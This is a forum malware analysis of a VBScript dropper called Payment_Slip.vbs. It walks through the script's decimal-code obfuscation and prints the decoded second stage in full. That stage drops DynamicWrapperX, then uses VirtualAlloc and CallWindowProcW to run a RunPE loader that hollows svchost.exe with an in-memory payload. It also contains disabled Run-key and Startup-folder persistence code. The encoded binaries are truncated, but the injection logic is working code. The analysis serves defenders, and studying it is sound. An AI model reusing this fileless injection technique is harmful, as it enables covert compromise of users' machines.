Malware Analysis Payment_Slip.vbs - a script with API calls & file-less payload : injection - updated

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/19-10-2016-11.64615/
Thanks to @Der.Reisende

Why this sample?

The first stage is easy to deobfuscate, but the second stage is the interesting part: a DLL and a file-less payload are embedded in the script:
=> DynamicWrapperX, to call DLL (Windows API) functions from VBScript
=> a loader (RunPE shellcode) copied into memory
=> the malware binary copied into memory, never written to disk
=> injection into the targeted host process
Detection ratio at the time of posting: 2/52
Antivirus scan for f0c6e212714e5fa40f38b67d5f59e3afefbd322da1bca2a429f9bb9cb1e0ffdc at 2016-10-19 15:42:57 UTC - VirusTotal

VBScript

1) What it looks like:
'ÿæñ$%ý#å.ý"æèö(ì!êþç&#)%åõêó.+ï/ìðë-ÿ%øýð/
dim SUNVBCGETVG
',ë-ö"þ!ëûÿýòÿå(û)ü#÷ûö'ëåïûú"// ðõ&./#ë-ýì
'êêý+êîþêù*óþð),öç!í'û+. þ+'òê..ôô.-/ò!ðì ñ)&ÿ.#èøêïþú'ø(ëü
SUNVBCGETVG = '"13--------------------10--------------------39--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------
...
...
=> 1,651,672 characters in the string!
...
"
'ìèûçò(è.(÷æ#ì&/ëêîú!îííèö'ïýû#ê&ïúò"÷&ð"/'ù
'õüêìôñþ/úúöêúÿ!ü'ýñ÷ö#&'ö/&.øïý-$ûþçñìû.íþ&()ó&$ëü'! "+
Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)) '!!èó#æ ì$&%ýùý(ú*þþý( ('øæõ-í/ø%íå(íÿ íé,èè)'%é",
'ü(ñ&îíú(üó ì!()ôû ñö!ýèû""&÷öõ%"øêù$"øõ'õöñ,ùéêóð$ë#ú
Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC) '÷ç÷%-î%ò),ê-ì+,òðöûýóóôþú(òú*ö.êùï/êþü./øéêéð!"/å+éôù*î
'%þíæ(!çæ$ë-éð&*$ìöøçó*!+óúýù÷óððéü+ê(þí+%íçé
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
'ÿ'÷ê#"!û÷÷ç ""þïóè"æý ö*ú.ê)-óõ.&+òæ%&#,+ô'÷ø.ÿ(ðõ)ñ& .!õê.æôå"ê/ý÷.çÿ.*,ùú-
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK) 'øï(üð" ïüÿ,$ê ïïê ù"öæö& *"#!èæ÷öêó÷î/åñ,&í%òôù(+.$/í,ìý&ìçõ
'üý%ùò,-&ìó.ï-ö&#ýù*ñ/%(,ûïýðþ÷ö*#ï/ü("õøòé+
BSBPIFYBTESIP = BSBPIFYBTESIP + 21 '$æíü÷óñ%"ÿï-+-ý)õþ.õýýèó!íæ#úî ïýöô÷!ð%
'*ø î.-*/éì),ïñ+ñ$*$éç ü!éíðö!åì-åæòîõ&þö.õó"øî++"$ñ%'íî÷
Next 'ìö-î÷%íí(ç-ý-é÷êóé!è#ïúìëè*#
'çí$+,ô-þï#ê/$æ+øíôú%'ýõðôè&ü"íòí-
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH 'èø/#ëó+çõìø&,ôôú ó÷éì!"#üóðö+.(ùþ-èå
'%úÿûòë#-é((ÿ#þ#ìñöñ)ùå-êþ**øëìñóùõî õ/ çñúù* %ë%(ðõííýüç'!&å%ç/ë#ðî
End Function '&$îç%÷*î+øÿ'%*.ëû$ûúèíèûê ëö#+ëæñùüé
'/+/þ!ó#éôýì.ô#$/ù,ýøæðÿÿíðÿï/(ÿì


2) Deobfuscation:
2-1) Quick clean:
Most of the script is padding: the comment character ' followed by junk characters, appended to almost every line.

I cleaned it; here is the obfuscated script without the fake comment parts:

dim SUNVBCGETVG
SUNVBCGETVG = '"13--------------------10--------------------39--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------45--------------------61--------------------
...
...
=> 1,651,672 characters in the string!
...
"

Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG))

Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC)

For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK)
BSBPIFYBTESIP = BSBPIFYBTESIP + 21
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH
End Function
2-2) How it works:

SUNVBCGETVG:

=> a very long string holding the real content, obfuscated.

Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)):

=> CLHHFSRSPXGUHEQJ(SUNVBCGETVG): calls the decoding function with the obfuscated string as parameter
=> Execute: runs the returned string as VBScript code
Let's look at the function.

Public Function CLHHFSRSPXGUHEQJ(UDTVUMCEZLZJXKC)
For BSBPIFYBTESIP = len("-") To Len(replace(UDTVUMCEZLZJXKC,"",""))
YHRDSIPKZK = replace((Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3)),"-",""):CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK)
BSBPIFYBTESIP = BSBPIFYBTESIP + 21
CLHHFSRSPXGUHEQJ = CFNXFSGWBHNKTSWQIH
End Function

A For loop runs from index 1 up to the length of the obfuscated string (len("-") is just an obfuscated way of writing 1, and replace(s,"","") is a no-op that returns s unchanged).

In the loop:

- YHRDSIPKZK = replace(Mid(UDTVUMCEZLZJXKC, BSBPIFYBTESIP, 3),"-",""):

=> retrieves 3 chars of the obfuscated string starting at the current index, and removes the "-" occurrences
- CFNXFSGWBHNKTSWQIH = CFNXFSGWBHNKTSWQIH & Chr(YHRDSIPKZK):

=> appends one character to the result (an empty string at the beginning), using a char-code-to-char conversion:
Chr(YHRDSIPKZK): the parameter is a string holding a decimal number; VBScript coerces it to that number, and Chr returns the corresponding character
- BSBPIFYBTESIP = BSBPIFYBTESIP + 21:

Index = index + 21, and Next then adds the loop step (1) on top of it, so the effective stride is 22 characters: each record of the obfuscated string (one decimal code followed by "-" padding) is 22 characters wide, which is why the codes line up with the index.
Example:

Result = ""
index: 1
retrieves "13-"
=> "13"
Result = Result & Chr("13") => in VBScript & is the concatenation operator
Result = "\r" => carriage return
index = index + 21 = 22, then Next makes it 23

Next loop:
Result = "\r"
index: 23
retrieves "10-"
=> "10"
Result = Result & Chr("10") => 10: ASCII for newline: "\n"
Result = "\r\n"
index = index + 21 = 44, then Next makes it 45

Next loop:
Result = "\r\n"
index: 45
retrieves "39-"
=> "39"
Result = Result & Chr("39") => 39: ASCII for ' (try ALT+39 :) )
Result = "\r\n'"
index = index + 21 = 66, then Next makes it 67

Etc. The records that follow, 61 and 45, are "=" and "-": the decoded script starts with the "'=-=-=-=-= CONFIG" line shown below.

At the end, it returns a string containing the real malicious script, and this string is passed to Execute.

2-3) Conclusion on the obfuscation used, and the malware part:

Only decimal ASCII codes, padded with "--------", in one long string.

Real content:
I cut most of the long data strings, to protect you and to avoid too many lines :oops:
'=-=-=-=-= CONFIG =-=-=-=
HOST_FILE = "system32\\Svchost.exe"
FILE_NAME = "injector.vbs"
INSTALL_DIR = "%temp%"
START_UP_REG = false
START_UP_TASK = false
START_UP_FOLDER = false


COMMAND_LINE = ""
'=-=-=-=-= CONFIG =-=-=-=
ON ERROR RESUME NEXT
'=-=-=-=-= GLOBAL =-=-=-=
SET FILESYSTEMOBJ = CREATEOBJECT ("SCRIPTING.FILESYSTEMOBJECT")
SET SHELLOBJ = WSCRIPT.CREATEOBJECT ("WSCRIPT.SHELL")
DIM I

'=-=-=-=-= GLOBAL =-=-=-=

'=-=-=-=-= CONSTO =-=-=-=
DCOM_DATA = _
"TVpsAAEAAAACAAAA//8AAAAAAAARAAAAQAAAAAAAAABXaW4zMiBQcm9ncmFtIQ0KJLQJugAB" & _
"zSG0TM0hYAAAAEdvTGluaywgR29Bc20gd3d3LkdvRGV2VG9vbC5jb20AUEUAAEwBBwA1dfhI" & _
...
...

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="

LOADER_DATA = _
"VYvsg8T4U1ZXi30Mi3UIjV38M8BVaP9QQABk/zBkiSDolwcAAIkDiwMFIAEAAFDoEAIAAFDo" & _
"LgIAAFDonAIAAIsTiYIcAQAAiwMFLAIAAFDo7wEAAFCLAwUcAgAAUIsD/5AcAQAAUOhwAgAA" & _
...
...
"AAAAAAAAVmlydHVhbEFsbG9jRXgAAAAAAABWaXJ0dWFsQWxsb2MAAAAAAAAAAFZpcnR1YWxG" & _
"cmVlAAAAAABUZXJtaW5hdGVQcm9jZXNzAAAAAAAAAABHZXRDb21tYW5kTGluZVcAbnRkbGwu" & _
"ZGxsAAAAAAAAAE50VW5tYXBWaWV3T2ZTZWN0aW9uAAAAAA=="

DIM FILE_DATA(10)
FILE_DATA (0) = "r8dBsj08fFQn9bEppowJqKQHJrby/RIW7UaFku4LEGf4AGbYizwN0CQeOrAjwuv08bsyfCU2yWTFw3RfHafgwrZJmhQ1HHVMR9ji2mB2jgjUOz4mWPkU/w58jQ7lL/ixLVXN4cl9yKpyqgBKVrb4LSOI2VVyZ318+qWpkTw4aH16920...
...
HcQ1BqnApX2fk5AuAIf4nh4r5sE1hK5nbe4YJiNrNkyw8CaQqklC5B/r3PkAtdd6mCH6xZOkZ9ZBD8dnxcca91UvxnLuhFtv7cphTajYg=="

FILE_DATA (1) = "twmMywo8/w6GRCk3AFQlOcwH8F53ufKnkayKaBgBKwcAQaYPiFbAFN34Gny6IBCP3xN3E7ZwtIajKPaY4ocVNxRvZAAPhw+xvxuA3Mz0EwpXT/TlreVWiVtWo2xV/wQ9Je/CJD53J+3yCHojmE1FVJUCHXY49JinZBPxNEoeG7YV
...
...
3yyxqzBxUPhsnt4jBLo/7QC+Q+YhWLhkA3P4hSa8NksKQpi+6A1y4BhGKNaVGR7fM/OKMH1cgQ39DS2bnmZtzPlFidmAPh9Anb3UqjGuWT2mIX/2BQ5O7FNI1GAQSpS4Ww+lTxzYJi1YfMhuMQmkdgESlcGOUB0LhCa9fDhL3AR2w=="
FILE_DATA (2) = "glOqrreb+sKq4EjO5ArP9e94gBR1Q+jgOA7Oks+WQ/Zd41US7ZoBG2C6Vj3HN2tgxm7y7oElRnn0yXTFPfBW+OX9dVyQh2rB1XOpuIKiaZjTC98S+2iTkajGVPOrLqnQBGxKgEOKBDKNGVDzMX+g1SYgTJHjdYdreANAWh3oOn5HMS....
...
PT4jyMg37rx8qR8W1v8ttPrlBSqE5AG+V6N+bO592gBWbgcKznqn0wKf8bm5cMb5vUjv3/X5QOmeE5aspAIvKty9PZPESKFGyKt4I29BtVkqND6WtMqvttvQuwgjAtakxNoXyscAhVArCuxmB+wew0PEMuMvvz2INbh9J/lYOlwlrWJjOg=="
FILE_DATA (3) = "WxZwRHaSiMHGatFfQfM3JAaR8jDoAmkneR8b7mhlK+8iKwZgtfZX+tOAstB0L2RRYQBKFvD8Jm62Tmz32uIaVYHWv.DFXaqI5ixYKgUMlmeUTz/L8QIMHu33XqmzsseXFxLO9qHNNuXc48oiKqCTr69ZbdeTENYJJ1Nen/0WS6BBHt...
...
tVhs+TTZZKdQD1457k/2YQLgleCkfvYrgiocw11+GRzgDVno+7gioC9oTGHgoNPO+vh9kAHNNDT/AJwpjnUmd9zxZalXAP3ATs39B0vr4uIrOGOH2/wfnXTRMw7E5o/mGZ4L0EYn6UP17hmOQ5EBsMC0XY7gOk1zxvzsSMRzVAE1HsdMDilcO6GyworcYacAO+feZT1tjFa11t8AU2NivZlfbWoWrQ=="

FILE_DATA (4) = "ZzO6bAUjg6JsyDZemhj37xWh0B6iozPBBi438JzKgSXUlMF0/X9W6h3zBSUoYmDsbHpvGKPfCkBJVgEb+7TLLPnqo+1G0EkO/NlKy7tvgqA8jvAjFAwVvtoIMCCCYh63rCPRnK6P8xjuUCunYppuPTw9yAnizPP2fU8YPD2R9SXQfhzgXC...
...
99OTNPfnpwYrfjefeHNyfYSXUS6Vd2DpB3GewfOCx5jvyTCMXqW/OaU4vYK3sH9MvZOuAt0gimvyL/7HNU4Ocia0eHbe2aKPpkKzVBDzWVwFtFzPEFnBZSrHN0hvw=="

FILE_DATA (5) = "MJNqIdZ1uXStpejnW5CpqDgtnby/vIUOEyh95BhKhc+By5XMH43OhaoQ8DaS/jo1tCyPl2EiMN2HRaLZg7lbjd6b6ic6o.sqhIAmubRGtJ5emVmLxH3avnaiiepZbz+39urg//3TBLlUOGe2j7E03Zubs9e8PywkfpASWjqknNnP1G9KEHg...
...
McJoX08PLHa+QHqh5hSUr54hVadQftCdbcCmTF9vBsdUm6R9IqGYa3AolZ4mFYOnveLcxfDOVOOyWY5xsLlOOGud1y8RJG2aXoQ7MRm1eo5kIHUsDCR9dVem+ArOow=="

FILE_DATA (6) = "x4fzHD8BvenVSFZuBvNL9YJmBjYdSkKDtbtzCek9LJEBw8tVwHEQnSi95n91HnK6AohNfNlPef7njeIpUZQbshBtVipYuo2h5Z+DY7FhVHFjNoh/RSV8chen6q6mds6h0ZkatwnARYUOPMP34hSG44pxellgtramKOFOenOLivA3/bkIiz....
...
Dp58PTJtZOl5yzuTlGdA5F/u9hgZTszlo8/Bbut7NL01rOWFGbZOa1nITRJyy5L/7ruVEALeiymQOzy+LDzaU5ZTc7/Utgfm+VQ7HX54UKfdQjLmLD1DBZTiKEztNcJ5HIYNIW53yaXQ0KZNCA=="

FILE_DATA (7) = "V7YaHTaF8+ho4vZz9FpWiy2/uJV18nQ9hx1ERmGqgMn51Y3YavcBBADiIe33FOYxhGJxmu8zAlCVJizhpCepw4tmpikDkrJnVUhG60VwMrvY2rySeiFhGyOl75bjH+GXlo4Jx1GtEfz0jwAKoEGUgBnXU9i5veroF50DjmGk1oMyrHAF....
...
tCig4hbSu/ZBNpmwrMm14QycNecqJXb+KcyERChxqslnyQ9DeZGu4ODhYTeY+L1uVfQQCJ7yxFHeLA0h5eD4sLsPzQqosnj8ezF58VU/LHsZZNCtWgExr0X+MtdW/CMPVAb+pDynmi3tUpYZRyg=="

FILE_DATA (8) = "6DGvTSwA7nUrhI66OqmEElJTbMPU3DyR6FVnyTbh6gj56u954fvPcxLS197EJOr1BXYSebRNKSAj/TbdqizPsEqLd18m.tFORl5CCLvioHzPKgoAQbbRuPYhz3F+fIg7x4w4nIL2agbubZ/taz6EHRNTdpOOxukKzS7+PvP3IlnJRzyeEncZ...
...
7Rvus5Eq1NxZwGlJwkwPhu5PoSk5dnZ5rrPUdcP0KwFOAK5t+a3PHgLYuzGIQIUItrV2HOrM0fU2ZgPHkcjyQmELUrkpBz7sFHo/KrzI24jmnzhVpLV/TGIESZni7ViJHtw=="

FILE_DATA (9) = ""

FILE_SIZE = 35328

'=-=-=-=-= CONSTO =-=-=-=

'=-=-=-=-= MYCODE =-=-=-=
START
FIX_WOW64

DCOM_NAME = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (INSTALL_DIR) & "\\" & FILE_NAME & ".BIN"
IF NOT IS_DOTNET THEN
HOST_FILE = SHELLOBJ.EXPANDENVIRONMENTSTRINGS ("%WINDIR%" & "\\" & HOST_FILE)
ELSE
HOST_FILE = SHELLOBJ.EXPANDENVIRONMENTSTRINGS ("%WINDIR%")&"\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSBUILD.EXE"
END IF


WRITE_FILE DCOM_NAME,TEXTTOBINARY(DCOM_DATA, "BIN.BASE64")

DO
SHELLOBJ.RUN "REGSVR32.EXE /I /S "& CHR(34)&DCOM_NAME& CHR(34),0,TRUE
SET DCOM = CREATEOBJECT("DYNAMICWRAPPERX")
WSCRIPT.SLEEP 1000
LOOP UNTIL ISOBJECT(DCOM)

DCOM.REGISTER "USER32.DLL", "CallWindowProcW",LCASE("I=PHULL"), LCASE("R=U")
DCOM.REGISTER "KERNEL32.DLL", "VirtualAlloc",LCASE("I=PUUU"), LCASE("R=P")

LOADER_DATA = BASE64TOHEX (LOADER_DATA)
FOR I = 0 TO UBOUND (FILE_DATA) -1 STEP 1
FILE_DATA(I) = BASE64TOHEX (FILE_DATA(I))
NEXT

LOADER_PTR = DCOM.VIRTUALALLOC (0,LEN(LOADER_DATA)/2,4096,64)
FOR I = 1 TO LEN (LOADER_DATA) STEP 2
CHAR = ASC(CHR("&H"&MID (LOADER_DATA,I,2)))
DCOM.NUMPUT EVAL(CHAR),LOADER_PTR,(I-1)/2
NEXT
COUNT = 0
PE_PTR = DCOM.VIRTUALALLOC (0,FILE_SIZE+1,4096,64)
FOR I = 0 TO UBOUND (FILE_DATA) -1 STEP 1
FOR X = 1 TO LEN (FILE_DATA(I)) STEP 2
CHAR = ASC(CHR("&H"&MID (FILE_DATA(I),X,2)))
DCOM.NUMPUT EVAL(CHAR),PE_PTR,COUNT
COUNT = COUNT + 1
NEXT
NEXT
DCOM.CALLWINDOWPROCW LOADER_PTR,PE_PTR,DCOM.STRPTR (HOST_FILE),DCOM.STRPTR (COMMAND_LINE),0

SUB FIX_WOW64

SET OBJWMISERVICE = GETOBJECT ("WINMGMTS:\\\\.\\ROOT\\CIMV2")
SET COLITEMS = OBJWMISERVICE.EXECQUERY ("SELECT * FROM WIN32_COMPUTERSYSTEM")
FOR EACH OBJITEM IN COLITEMS
SYSTEMTYPE = OBJITEM.SYSTEMTYPE
NEXT
IF (UCASE(SYSTEMTYPE) = "X64-BASED PC") AND (INSTR (UCASE(WSCRIPT.PATH),"SYSWOW64") = 0) THEN
SHELLOBJ.RUN SHELLOBJ.EXPANDENVIRONMENTSTRINGS("%WINDIR%")&"\\SYSWOW64\\WSCRIPT.EXE //b //e:vbscript "&CHR(34)&WSCRIPT.SCRIPTFULLNAME&CHR(34)
WSCRIPT.QUIT
END IF

END SUB

SUB START ()
IF START_UP_REG = TRUE THEN
START_F = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (INSTALL_DIR) & "\\" & FILE_NAME
FILESYSTEMOBJ.COPYFILE WSCRIPT.SCRIPTFULLNAME,START_F ,TRUE
SHELLOBJ.REGWRITE "HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\" & FILE_NAME,"WScript.exe //b //e:vbscript " & CHRW(34) & START_F & CHRW(34) ,"REG_SZ"
END IF
IF START_UP_FOLDER = TRUE THEN
FILESYSTEMOBJ.COPYFILE WSCRIPT.SCRIPTFULLNAME,SHELLOBJ.SPECIALFOLDERS ("STARTUP") & "\\" & FILE_NAME & ".vbs" ,TRUE
END IF
IF START_UP_TASK = TRUE THEN

END IF
END SUB

FUNCTION BINARYTOTEXT (BINARY, DATATYPE)

DIM DOM
SET DOM = CREATEOBJECT("MICROSOFT.XMLDOM")
DOM.LOADXML("<HELLO/>")
DOM.DOCUMENTELEMENT.DATATYPE = DATATYPE
DOM.DOCUMENTELEMENT.NODETYPEDVALUE = BINARY
DOM.DOCUMENTELEMENT.REMOVEATTRIBUTE(LCASE("DT:DT"))
BINARYTOTEXT = DOM.DOCUMENTELEMENT.NODETYPEDVALUE
END FUNCTION

FUNCTION TEXTTOBINARY (TEXT, DATATYPE)

DIM DOM
SET DOM = CREATEOBJECT("MICROSOFT.XMLDOM")
DOM.LOADXML("<HELLO/>")
DOM.DOCUMENTELEMENT.NODETYPEDVALUE = TEXT
DOM.DOCUMENTELEMENT.DATATYPE = DATATYPE
TEXTTOBINARY = DOM.DOCUMENTELEMENT.NODETYPEDVALUE
END FUNCTION

FUNCTION BASE64TOHEX(STRBASE64)

BASE64TOHEX = BINARYTOTEXT(TEXTTOBINARY(STRBASE64, "BIN.BASE64"), "BIN.HEX")
END FUNCTION

FUNCTION WRITE_FILE (FILE_NAME,FILE_DATA)

IF FILESYSTEMOBJ.FILEEXISTS (FILE_NAME) THEN EXIT FUNCTION
CONST ADTYPEBINARY = 1
SET BINARYSTREAM = CREATEOBJECT("ADODB.STREAM")
BINARYSTREAM.TYPE = ADTYPEBINARY
BINARYSTREAM.OPEN
BINARYSTREAM.WRITE FILE_DATA
BINARYSTREAM.SAVETOFILE FILE_NAME
SET BINARYSTREAM = NOTHING
END FUNCTION

3) Explanation of the real content:

All parts are in UPPERCASE, and I really think it hurts the eyes :confused:
So, in the parts below, I converted everything to lowercase (to avoid going blind ...)

3-1) Config / global data:

Here is the important data used later; the script bases its decisions (some value tests) on it:

'=-=-=-=-= CONFIG =-=-=-=
host_file = "system32\\svchost.exe"
file_name = "injector.vbs"
install_dir = "%temp%"
start_up_reg = false
start_up_task = false
start_up_folder = false

command_line = ""

'=-=-=-=-= config =-=-=-=
on error resume next
'=-=-=-=-= global =-=-=-=
set filesystemobj = createobject ("scripting.filesystemobject")
set shellobj = wscript.createobject ("wscript.shell")
dim i

We can already see some well-known parts (if you have followed some of my posts):

=> two objects are created, one for file manipulation, the other for shell access

3-2) Constant objects :

'=-=-=-=-= CONSTO =-=-=-=
dcom_data = .....
loader_data = .....
dim file_data(10)
file_data (0) = ....
file_data (1) = ....
...
file_data (9) = ....

file_size = 35328

Several (very long) Base64-encoded strings are used.

We will see later that:

dcom_data => the DLL (used to allow the API calls)
loader_data => the encoded loader (RunPE shellcode)
file_data => array of encoded strings: the malware binary, split into parts

loader_data and file_data will be decoded and used for the injection :D
3-3) Some functions:
binarytotext
texttobinary
base64tohex


For the data conversions, the functions use a MICROSOFT.XMLDOM object: setting an element's dataType to "bin.base64" or "bin.hex" makes nodeTypedValue encode or decode its content.

Example:

function textToBinary (text, datatype)
dim dom
set dom = CreateObject("MICROSOFT.XMLDOM")
dom.loadXML("<HELLO/>")
dom.documentElement.nodeTypedValue = text
dom.documentElement.dataType = dataType
textToBinary = dom.documentElement.nodeTypedValue
end function
Here, using a DOM object, the conversion is very easy; this MSXML trick is a classic Base64/hex codec in VBScript malware, and base64tohex chains the two functions to go from Base64 text to a hex string.
write_file

function write_file (file_name,file_data)
if fileSystemObj.fileExists (file_name) then exit function
const adTypeBinary = 1
set binarystream = createobject("adodb.stream")
binarystream.type = adtypebinary
binarystream.open
binarystream.write file_data
binarystream.saveToFile file_name
set binarystream = nothing
end function

It uses the fileSystemObject created in the global data part (see 3-1)) to skip the write if the file already exists,
and an adodb.stream object to create the file on disk, with the path and the binary data as parameters.
3-4) How it works:

In VB, a Function can return a value, a Sub doesn't (there are other differences, but they don't matter here).

'=-=-=-=-= MYCODE =-=-=-=
start

calls a Sub that does its job or not depending on the Boolean values below:

start_up_reg
start_up_task
start_up_folder

sub start ()
if start_up_reg = true then

=> it copies the script to install_dir and writes an HKCU Run key, so the copy runs at each logon of the user

start_f = shellobj.expandenvironmentstrings (install_dir) & "\\" & file_name
filesystemobj.copyfile wscript.scriptfullname,start_f ,true
shellobj.regwrite "hkey_current_user\\software\\microsoft\\windows\\currentversion\\run\\" & file_name,"wscript.exe //b //e:vbscript " & chrw(34) & start_f & chrw(34) ,"reg_sz"
end if
if start_up_folder = true then

=> it copies the script into the Startup folder

filesystemobj.copyfile wscript.scriptfullname,shellobj.specialfolders ("startup") & "\\" & file_name & ".vbs" ,true
end if
if start_up_task = true then

=> empty part (the scheduled-task persistence is not implemented)
end if
end sub

In the current script :

start_up_reg = false
start_up_task = false
start_up_folder = false
=> the start sub does nothing
fix_wow64

sub fix_wow64
set objwmiservice = getobject ("winmgmts:\\\\.\\root\\cimv2")
set colitems = objwmiservice.execquery ("select * from win32_computersystem")
for each objitem in colitems
systemtype = objitem.systemtype
next
if (ucase(systemtype) = "x64-based pc") and (instr (ucase(wscript.path),"syswow64") = 0) then
shellobj.run shellobj.expandenvironmentstrings("%windir%")&"\\syswow64\\wscript.exe //b //e:vbscript "&chr(34)&wscript.scriptfullname&chr(34)
wscript.quit
end if
end sub

If the script is running on a 64-bit OS and not already from SysWOW64, it relaunches itself with %windir%\syswow64\wscript.exe (the 32-bit script host) and quits. This matters because the embedded DLL is a 32-bit PE (once dcom_data is decoded, its header shows Machine = 0x14C, i386), so it can only be loaded into a 32-bit process.

=> syswow64 :

"32-bit applications that include only 32-bit kernel-mode device drivers, or that plug into the process space of components that are implemented purely as 64-bit processes (e.g. Windows Explorer) cannot be executed on a 64-bit platform. 32-bit service applications are supported. The SysWOW64 folder located in the Windows folder on the OS drive contains several applications to support 32-bit applications"​
dcom_name = shellobj.expandenvironmentstrings (install_dir) & "\\" & file_name & ".bin"

=> file_name = "injector.vbs"
=> install_dir = "%temp%"

=> dcom_name: %temp%\injector.vbs.bin
if not is_dotnet then
host_file = shellobj.expandenvironmentstrings ("%windir%" & "\\" & host_file)
else
host_file = shellobj.expandenvironmentstrings ("%windir%")&"\\microsoft.net\\framework\\v2.0.50727\\msbuild.exe"
end if

Here, the host_file is:

"%windir%\system32\svchost.exe" if the .NET Framework is NOT installed,
else: "%windir%\microsoft.net\framework\v2.0.50727\msbuild.exe"

Note that is_dotnet is never defined in the script as shown: an undeclared name evaluates as Empty, so not is_dotnet is True and the svchost.exe branch is always taken; the msbuild.exe branch is dead code here.

write_file dcom_name,texttobinary(dcom_data, "bin.base64")

It creates injector.vbs.bin in %temp% (after Base64 decoding) using the functions seen in part 3-3),
from the hard-coded dcom_data string.

What is this file? A DLL, in reality :D
What is this DLL for?
Hahaha, see below :)

do
shellobj.run "regsvr32.exe /i /s "& chr(34)&dcom_name& chr(34),0,true
set dcom = createobject("dynamicwrapperx")
wscript.sleep 1000
loop until isobject(dcom)

=> a loop that registers injector.vbs.bin with regsvr32 (/i calls DllInstall, /s is silent) and retries every second until createobject("dynamicwrapperx") succeeds

dcom.register "user32.dll", "callwindowprocw",lcase("i=phull"), lcase("r=u")
dcom.register "kernel32.dll", "virtualalloc",lcase("i=puuu"), lcase("r=p")

=> Now I can explain:

- a DLL (injector.vbs.bin) is registered,
- an object "dynamicwrapperx" is created => dcom
- this object is used to register two functions from the Windows API (the "i=" string gives the parameter types and the "r=" string the return type: p = pointer, h = handle, u = unsigned 32-bit integer, l = signed 32-bit integer):

injector.vbs.bin is in fact dynamicwrapperx.dll
An ActiveX component (COM server) that allows to call functions exported by DLL libraries, in particular Windows API functions, from scripts in JScript and VBScript.

=> callwindowprocw and virtualalloc can now be called from the script.
loader_data = base64tohex (loader_data)
for i = 0 to ubound (file_data) -1 step 1

file_data(i) = base64tohex (file_data(i))
next

=> the loader_data and file_data strings are now decoded into hex strings

loader_ptr = dcom.virtualalloc (0,len(loader_data)/2,4096,64)
for i = 1 to len (loader_data) step 2
char = asc(chr("&h"&mid (loader_data,i,2)))
dcom.numput eval(char),loader_ptr,(i-1)/2
next
count = 0

=> uses virtualalloc to commit memory in the virtual address space of the calling process (the wscript.exe process); 4096 is MEM_COMMIT and 64 is PAGE_EXECUTE_READWRITE, so the buffer is RWX
=> loader_ptr is a pointer to this allocated memory
=> loader_data is written into the allocated memory after some conversion:

- a single For loop, because loader_data is one string (step 2: one hex byte per iteration)

char = asc(chr("&h"&mid (loader_data,i,2)))
dcom.numput eval(char),loader_ptr,(i-1)/2

=> mid (loader_data,i,2) takes two chars from the current index i
=> "&h" is prepended so that the Chr function treats the string as a HEX number:

- example: "&h41" (HEX) does not give the same result as "41" (decimal)
=> chr("&h41") => 'A'
=> chr("41") => ')'
=> char = asc(chr(...)):
gives back the byte value (decimal)
=> dcom.numput eval(char),loader_ptr,(i-1)/2

writes the byte at the loader_ptr address with offset (i-1)/2
pe_ptr = dcom.virtualalloc (0,file_size+1,4096,64)
for i = 0 to ubound (file_data) -1 step 1

for x = 1 to len (file_data(i)) step 2
char = asc(chr("&h"&mid (file_data(i),x,2)))
dcom.numput eval(char),pe_ptr,count
count = count + 1
next
next

=> uses virtualalloc to commit another RWX buffer (same flags) of file_size+1 bytes
=> pe_ptr is a pointer to this buffer
=> file_data is written into the allocated memory after the same conversion:

- nested For loops, because file_data is an array of strings:

=> each string is handled by index i and, for each one, index x walks through it two hex chars at a time:

=> HEX representation (two chars) to byte value
=> writes the byte at the pe_ptr address with offset count, which keeps increasing across the chunks so they are laid out contiguously
=> THE FILE-LESS MALWARE: a complete PE image (file_size = 35328 bytes) that exists only in memory

C++ :


LPVOID WINAPI VirtualAlloc(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);
Here, for both allocations: lpAddress = 0 (let the system choose the address), dwSize = the size to allocate, flAllocationType = 4096 (0x1000, MEM_COMMIT) and flProtect = 64 (0x40, PAGE_EXECUTE_READWRITE). The two buffers are therefore writable and executable at the same time, which is what the loader needs and what a memory scanner should flag.

=> the return value is a pointer to the beginning of the allocated memory
dcom.callwindowprocw loader_ptr, => the RunPE shellcode
pe_ptr, => a pointer to the malware
dcom.strptr (host_file), => pointer to the host_file string
dcom.strptr (command_line), => pointer to the command_line (here: "")
0

=> CallWindowProcW is abused as a call gate: it treats its first argument as a window procedure and calls it, so the RWX buffer holding the loader is executed with the four other arguments as its parameters (the PE pointer, the host path, the command line and 0)

=> the loader injects the malware part into the targeted host_file; the API names visible in loader_data (VirtualAllocEx and NtUnmapViewOfSection among them) are the classic RunPE / process hollowing set, where the host is started suspended, its image unmapped, the payload written in its place and the main thread resumed

=> the malware part then runs inside the host process

